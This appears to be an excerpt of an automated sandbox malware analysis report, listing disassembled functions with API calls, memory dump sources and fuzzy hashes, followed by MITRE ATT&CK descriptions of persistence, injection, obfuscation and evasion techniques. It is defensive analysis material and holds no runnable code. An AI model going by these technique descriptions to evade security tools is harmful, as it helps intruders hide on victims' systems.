Function 2740EE60 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 2740EF04

Memory Dump Source

Source File: 00000007.00000002.2963702210.0000000027400000.00000040.00000800.00020000.00000000.sdmp, Offset: 27400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27400000_nhpoymuP.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e800c5fada21cbc503288310e22ee6f0c638e103982902c7f885225549e2074a
Instruction ID: c217d489def376bdae9e4787f0ecad15bb1f6cbcc3fd0eb914cd810bbd394b09
Opcode Fuzzy Hash: e800c5fada21cbc503288310e22ee6f0c638e103982902c7f885225549e2074a
Instruction Fuzzy Hash: C13197B5D01258AFCF14DFA9D980ADEFBF1BB49310F20942AE818B7210D735A945CF98

Function 2BFADA58 Relevance: 1.6, APIs: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 2BFADADB

Memory Dump Source

Source File: 00000007.00000002.2976268913.000000002BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2BFA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2bfa0000_nhpoymuP.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: b0006004bb6a30adeb9f813b48f9f52c0507cc1cbcbd4c6cdf40397ea7b9836f
Instruction ID: 2b66dcc5b4b676e30385349655ceb83bafa0b08452247948544075a9435d61ba
Opcode Fuzzy Hash: b0006004bb6a30adeb9f813b48f9f52c0507cc1cbcbd4c6cdf40397ea7b9836f
Instruction Fuzzy Hash: 063189B9D042089FCB14CFA9D584ADEFBF1EB49324F14905AE818B7310D775A941CFA5

Function 2BFADA60 Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 2BFADADB

Memory Dump Source

Source File: 00000007.00000002.2976268913.000000002BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2BFA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2bfa0000_nhpoymuP.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 44195990331ca8c2d97594ffaf152e972ed0f6df27a51f39dc4e6f0519fdb5cf
Instruction ID: db3292b2cd894b8ca33be8c6387550aaf6a22ab27707e95c5091d1c91128d8f8
Opcode Fuzzy Hash: 44195990331ca8c2d97594ffaf152e972ed0f6df27a51f39dc4e6f0519fdb5cf
Instruction Fuzzy Hash: EE219BB9D002089FCB14CFAAD580ADEFBF5AB49320F14905AE818B7310D775A941CFA5

Function 2B6F7E0C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 2B6F7F4E

Memory Dump Source

Source File: 00000007.00000002.2975158833.000000002B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B6F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b6f0000_nhpoymuP.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0711a088bdc86ab3faf36860f4d788a8ab99d8a82f1e41847d19b72bbf921363
Instruction ID: f5173f61dac2bc0fc029bc8156ef9ee59a4faf2b760736573a133f1b1a6357c0
Opcode Fuzzy Hash: 0711a088bdc86ab3faf36860f4d788a8ab99d8a82f1e41847d19b72bbf921363
Instruction Fuzzy Hash: 27116DB4E011198FDB04DFA8D484EADBBB6BF88314F249565E909E7342DB30AD81CB20

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.1828156271.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.1828156271.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 2740F130 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 2740F1AE

Memory Dump Source

Source File: 00000007.00000002.2963702210.0000000027400000.00000040.00000800.00020000.00000000.sdmp, Offset: 27400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27400000_nhpoymuP.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3c9fdfc9b0eabb6678b0d023ce46a1d1d595d568f4c29976bdb2e1190f14bbd9
Instruction ID: 497108c3fda1884e93aa2a39cff50fb0badc2c01a1abf6b9f86b568520f8b470
Opcode Fuzzy Hash: 3c9fdfc9b0eabb6678b0d023ce46a1d1d595d568f4c29976bdb2e1190f14bbd9
Instruction Fuzzy Hash: 7C31AAB5D012589FCB14DFAAD981ADEFBF4AB49310F10942AE814B7310D735A941CF98

Function 27A8E398 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe65f5a0fa5798d54c6ddb0fdeceb1f6aa091d6903989543d842ace4d145375
Instruction ID: aa6442a0b3cf97230ad6a5c27c2c19f24f4100f4ae0cf60112e8b06f9ec5e3e2
Opcode Fuzzy Hash: bfe65f5a0fa5798d54c6ddb0fdeceb1f6aa091d6903989543d842ace4d145375
Instruction Fuzzy Hash: 5F511674E01318DFDB14DFA5C994A9EBBB2FF88314F208529D409AB394DB355986CF41

Function 27A8C040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfa87632811bc3be4af89da59e19329813439ba416c50a6d36b54d708b02f6c
Instruction ID: 3a9e42312bb25301d6ee26f5a92b54834fc214fbeaa03837abd7b83f3e8c37d1
Opcode Fuzzy Hash: 5bfa87632811bc3be4af89da59e19329813439ba416c50a6d36b54d708b02f6c
Instruction Fuzzy Hash: F1518374E11218DFDB48CFA9D98499DBBF2FF89300F209169E419AB364DB31A945CF10

Function 27A83400 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d62c7fa43e885351a80603385ebba173bec8ab95ac9ad060a746cc2a6f33950
Instruction ID: 44d60ec45a2a2c5e044c99856d64fb4a64975417e82cda589cb32549992c3d0f
Opcode Fuzzy Hash: 6d62c7fa43e885351a80603385ebba173bec8ab95ac9ad060a746cc2a6f33950
Instruction Fuzzy Hash: 0251B678E01208CFCB08DFA9D59499DBBF2FF89314F209169E815AB364DB35A942CF50

Function 27A8F1A9 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4960757d48ec6a57c7e330d7b8aa4365aaad996e9571aa9c9c5941fa15a93db0
Instruction ID: ebbc84daeac5330d56f3d6d3c7dfcef901b654f798ac786beeb9f23b5fe60813
Opcode Fuzzy Hash: 4960757d48ec6a57c7e330d7b8aa4365aaad996e9571aa9c9c5941fa15a93db0
Instruction Fuzzy Hash: BC51BF74D01229CFCB65DF64C984BDCBBB1BB89315F1055AAD408A7350DB39AA81CF40

Function 27A89193 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dbe6eaf27015cfb26e81c28a19727f811ed3c5664658c00ade801860fdace08
Instruction ID: 3f2ddaafb5d91c850b5e2ab5355893c51352e6c9d630a2f33c3db063b53b899b
Opcode Fuzzy Hash: 4dbe6eaf27015cfb26e81c28a19727f811ed3c5664658c00ade801860fdace08
Instruction Fuzzy Hash: 6B418E31A04249DFCF05CFA5C848ADDBFB2FF89324F148159E925AB292D375EA54CB50

Function 27A85E58 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a6c35978b4cdf57a74a71a0dd062d106c256b6eaedf828d52b24c597de9b273
Instruction ID: 776008bc4cc733b6c8cba466c916f697f239cac44862ada23638a996deec7a0f
Opcode Fuzzy Hash: 2a6c35978b4cdf57a74a71a0dd062d106c256b6eaedf828d52b24c597de9b273
Instruction Fuzzy Hash: C841C171A00258DFCB05CF24C804BAA7BF6FF85324F14846AEC299B242D778DD55CB91

Function 27A844D0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45961a4599ebe396c86ec7e2122cf79efe91de30f5a25d1b3828649ad202f1f
Instruction ID: e037deae6b0032497e85cf210a43ebfbef6308cbc9a05d3888ab99c9115d14a0
Opcode Fuzzy Hash: e45961a4599ebe396c86ec7e2122cf79efe91de30f5a25d1b3828649ad202f1f
Instruction Fuzzy Hash: 75319E3230024AAFCB099F64D444AAE3BA2FF89310F108419FD15C7385DB39ED65CB91

Function 27A86E08 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3cd128f899f4ac69360a782a5226c5bfc0957d74e71242d2ce48f66f17f8442
Instruction ID: 55fea76d17f2bc4fb35eb6bedce8b836ee109c87b6d60cc57fe5c14779c26673
Opcode Fuzzy Hash: f3cd128f899f4ac69360a782a5226c5bfc0957d74e71242d2ce48f66f17f8442
Instruction Fuzzy Hash: 1121CF31300211CBF7046A3EC46463E369BBFC9625F18847AD925CB796EE6BCC829781

Function 27A85178 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2bec6a93b1851d525c2eb50d6c67f00ac7449a74ee3d98bcea79320693d6816
Instruction ID: 57a41e7f1bc3d58c94fbcd22f2b83c24c598a290ca5cc8d5da2fc92abb524e62
Opcode Fuzzy Hash: f2bec6a93b1851d525c2eb50d6c67f00ac7449a74ee3d98bcea79320693d6816
Instruction Fuzzy Hash: 5921F335301621DFC709AA65C89492E73A3BFC6661B108069DD16DB340DF38EC028BC0

Function 27A884F8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f13556e393045b2ca23d789b90e00e70c17b248adec7e9bc4d66b7bc3508ac3
Instruction ID: a6d6fd5008141b6ff5358b586d2b0bc6a182fad6172734ddf41985e00c06e442
Opcode Fuzzy Hash: 6f13556e393045b2ca23d789b90e00e70c17b248adec7e9bc4d66b7bc3508ac3
Instruction Fuzzy Hash: 94218D70A1121EDBDB18CFA0C955BAEBBB5FF84310F104129E411A7388DF39A941CB90

Function 27A844CA Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c30f09e13c0fdb6a1e2230b9ba0223ab7814251c5689487fd51c917d590149
Instruction ID: 4eabb22336c3e5593452a9858569fba85e71b86195d864e41fecb452d1a5f75e
Opcode Fuzzy Hash: c8c30f09e13c0fdb6a1e2230b9ba0223ab7814251c5689487fd51c917d590149
Instruction Fuzzy Hash: A7219D3260524AAFC7099F64D448AAE3BA6FF89721F108429FC15CB385DB38ED54CB91

Function 27A834F4 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d3cadd1840ff5ef76cea873e973d89c794713b49af7162cc5976c741dd0722
Instruction ID: 4e40b1ee5bfdb139008fff443cd58da26be3d9ac337dc2e4e9436a0840c71061
Opcode Fuzzy Hash: 52d3cadd1840ff5ef76cea873e973d89c794713b49af7162cc5976c741dd0722
Instruction Fuzzy Hash: A731D478E11348CFCB08DFA8D59489DBBB2FF49705B204169E819AB364DB39AD42CF40

Function 27A885F1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e5c2e5e1960b1601d2d2d2b8d1ae0e7cbe2a82beb809f441ba02cbd8cae914
Instruction ID: 6a36911edd8dfc13cc8486bcf09275c65253a6768263202425ec97c0b916294c
Opcode Fuzzy Hash: d0e5c2e5e1960b1601d2d2d2b8d1ae0e7cbe2a82beb809f441ba02cbd8cae914
Instruction Fuzzy Hash: 3D216D74E01249DFCB04CFB5C551AEEBBB6FF89315F148029E420E6255DB38A941DF50

Function 27A884E8 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc898c495608a1a3be6f8307b57bc82e635f52c3ac01dc699961f64d4f38c3fd
Instruction ID: 69f17bcd3f9951fdf75aa3798e9dee516a264744cb4091926a196c61baf0811d
Opcode Fuzzy Hash: cc898c495608a1a3be6f8307b57bc82e635f52c3ac01dc699961f64d4f38c3fd
Instruction Fuzzy Hash: 8F210475F21219DBCB08DF71D852AAEBBB6FF85311F104529E412AB394EF34A841CB90

Function 27A8E2A9 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5058fb3372364084310a362f9a3ca350a6245d618f7ba89e33e195063ccab59
Instruction ID: cf511c8290dc9454f21e47461619f9ec75cc9f8f2d52ac0f090e27624091591d
Opcode Fuzzy Hash: d5058fb3372364084310a362f9a3ca350a6245d618f7ba89e33e195063ccab59
Instruction Fuzzy Hash: 5C215870E00249DFCB45DFB9C99069EBFF2FB84300F1085A9D0599B365EB785A4ACB91

Function 27A8E2B8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d97cb1441efadf2f39994b8e4949dc930ad273d2cbb61471226170e7fe09af2b
Instruction ID: 3be160da0adc9485a8b7e920a4a1cd374c5333d5f8e538fb5dd9236e4fe04fb8
Opcode Fuzzy Hash: d97cb1441efadf2f39994b8e4949dc930ad273d2cbb61471226170e7fe09af2b
Instruction Fuzzy Hash: B1212C70E00209DFDB04DFB9C59069EBBF2FB84300F109569D0159B355EF746A45CB91

Function 27A8D3F1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a5ff4e54bf22da9d07f1c155cb98b4f286db493cd4df139363b290ef724813
Instruction ID: 8b026a62b2e25644a35555df6715bd1c777eaa43e365a07ccd112fa0214cd7c2
Opcode Fuzzy Hash: 96a5ff4e54bf22da9d07f1c155cb98b4f286db493cd4df139363b290ef724813
Instruction Fuzzy Hash: 23111778D0024AEFCB01DFA9C8559AEBBF1FF89310F1040A9E914A7350DB795A52CF92

Function 27A855B0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0f8b0f8a8c1be58b6642e73bac7b3bb8c6457ffb0d88d24946c3d63f92841f
Instruction ID: a782ce74977aee7f1fa70460daf061d5f08de7a40714493b94f69d764b1a308e
Opcode Fuzzy Hash: 6e0f8b0f8a8c1be58b6642e73bac7b3bb8c6457ffb0d88d24946c3d63f92841f
Instruction Fuzzy Hash: 29E0C23505A38D5FC307E735C9229D1BBBBFE422007608995E5444B76BFB7D588A8392

Function 27A8C1DB Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b112731b4702f8cd4b1e21620168ffe84f9f70a6d60b01c520bbbb93ecc95fa
Instruction ID: e9a217cd67a0df04110a0b8685e6efac3ba506cf746f235f87bd49584da8096f
Opcode Fuzzy Hash: 1b112731b4702f8cd4b1e21620168ffe84f9f70a6d60b01c520bbbb93ecc95fa
Instruction Fuzzy Hash: DED0E838E50018CBCB20EFA8E4898ECBBB0EF88322F24506AE824A3250C63458918F11

Function 27A89E3D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a4110c584db5bca7f4389bae29bec0b75512d75b7ae32518df1ba0118a2270
Instruction ID: 124fe5811d951d64334dd81fa9df3010d37c4164b23a4a6595ea6985b5910a0c
Opcode Fuzzy Hash: 12a4110c584db5bca7f4389bae29bec0b75512d75b7ae32518df1ba0118a2270
Instruction Fuzzy Hash: F2D0673BB40018DFCB049F99E840CDDF7B6FB98221B148516E915E3661C6319961DB54

Function 27A855C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd55939e5c83b3939d556003c1054aae8eafc00cdd0d6f1f2bf97fe1637dfa2
Instruction ID: 72c7e9443a7763c7e7a305097498c5a7adcbb1699a51917e68b4325f2f84fd14
Opcode Fuzzy Hash: 7fd55939e5c83b3939d556003c1054aae8eafc00cdd0d6f1f2bf97fe1637dfa2
Instruction Fuzzy Hash: C8C0123515430D4EC605E775D945556772EFA81200B50C524A4094775BEF7C68894691

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

